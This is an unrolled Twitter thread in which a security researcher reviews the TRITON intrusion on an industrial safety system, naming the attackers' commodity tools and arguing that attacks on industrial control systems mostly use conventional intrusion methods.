, 25 tweets, 11 min read Read on Twitter
Today at #S4x19, @electricfork and I debated different sides of "if OT tools and talent are needed to detect attacks on ICS." Some thoughts on ICS attacks and #TRITON in a tweep thread.
For the debate, I'm not convinced either way because there are few *public* intrusion data sets for either side of the argument. I think peeps are over it now, maybe no point to sharing this, but to get the convo started let's dump/share some rando #TRITON #TRISIS TTPs.
.@FireEye blogged/presented about #TRITON and some of the incident response activities in depth by @voteblake and friends in late 2017, fireeye.com/blog/threat-re… and
#TRITON was "unprecedented" it was "sophisticated" and it was "the first of its kind." It was also leaked to the internet (not by us), so nobody saw any other pieces, or talked about *how* the intrusion took place from an attacker TTP perspective.
In the #TRITON intrusion from the IT -> DMZ -> DCS -> SIS there were about 100 compromised systems, 99 of which were conventional Windows workstations and servers.
The #TRITON attackers used (or were observed using) DNS, HTTP, HTTPS, SSH, DCE/RPC, SMB, RDP protocols for various forms of interaction and C2. There were many connections directly to the internet.
The #TRITON attackers used Nmap, Iperf3, and other free utilities to perform internal reconnaissance and identified hosts and services on the "OT" network.
The #TRITON attackers used many sysinternals utilities including, but not limited to, PsExec, ADExplorer, ShareEnum, AccessEnum, ProcExp and so forth.
The #TRITON attackers lived off the land with things like PowerShell, ping, net, vssadmin. Standard stuff.
The #TRITON attackers used multiple SSH daemons with hardcoded crypto keys. They used things like PLINK for tunneled RDP, webshells, and METERPRETER. #basic
The #TRITON attackers used all the cats. Netcat, cryptcat, and @gentilkiwi's Mimikatz, the latter of which was used both in PE and PowerShell script form. #meow
When the jig was finally up, and remediation close, the #TRITON attackers did a quick smash and grab by stealing a fresh set of creds, SIS controller memory and project files from the SIS engineering workstation.
In June 2018, @reesespcres and I talked about "how" the malware developer(s) reverse engineered the #TriStation network protocol, fireeye.com/blog/threat-re…
In Oct 2018, @FireEye discussed elements of attribution and "who was behind" the #TRITON framework, fireeye.com/blog/threat-re…
If the #TRITON intrusion is a general exemplar for how ICS attacks occur, I see more similarities than I see differences from conventional intrusions in any other sector.
The notion of "ICS" is an artificial defender construct. Attackers see computers and networks. They don't care about the Purdue model. They follow a predictable attack lifecycle over the course of an intrusion.
The majority of so-called attacks on ICS are underpinned by basic computer intrusions enabled by conventional TTPs, tools and malware to serve as a conduit for impacting an industrial process. I think that we are best served by detecting adversary methods via @MITREattack TTPs
When ESET exposed #INDUSTROYER they extensively documented the unique attributes of the ICS tailored malware. Behind the scenes, the attack involved mostly conventional intrusion TTPs. #xp_cmdshell
There aren't that many ICS attacks/intrusion cases in the public discourse, and those that are discussed publicly often leave out the actual intrusion evidence and data. I want hard evidence, yo.
N anecdotes on ICS attacks do not meet our desired confidence interval or burden of proof, and even if N was sufficient, the opacity of shared data from these intrusion stories leave us without sufficient data to make a decision on how to best detect these things.
People in cybersecurity prefer to share what is new, novel, different rather than what is the same, even though what is the same offers a better basis for detection opportunities.
All of that said, what the hell do I know. I'm a newb in the ICS space. I came to #S4x19 to learn, not simply to pontificate and agree with myself. I'm looking for someone to convince me differently.
Are there any bona fide intrusions on ICS that show technical/forensic evidence contrary to my thesis? Show me the # of compromised systems. Show me the # of non Windows/Linux malware. Show me the forensic data. Convince me. Let's talk.
Nobody needs more #TRITON rumination from me. There are lots of great takes on the intrusion, malware, ICS attacks etc from other folks and its all just a google away.
If you're from the IT side and new to ICS threat stuff, I think you'll find @DragosInc blogs, @RobertMLee's robertmlee.org/tag/reading-li… and videos from S4 events youtube.com/channel/UC5MdL… extremely instructive.
Missing some Tweet in this thread?
You can try to force a refresh.

Like this thread? Get email updates or save it to PDF!

Subscribe to Steve
Profile picture

Get real-time email alerts when new unrolls are available from this author!

This content may be removed anytime!

Twitter may remove this content at anytime, convert it as a PDF, save and print for later use!

Try unrolling a thread yourself!

how to unroll video

1) Follow Thread Reader App on Twitter so you can easily mention us!

2) Go to a Twitter thread (series of Tweets by the same owner) and mention us with a keyword "unroll" @threadreaderapp unroll

You can practice here first or read more on our help page!

Follow Us on Twitter!

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just three indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!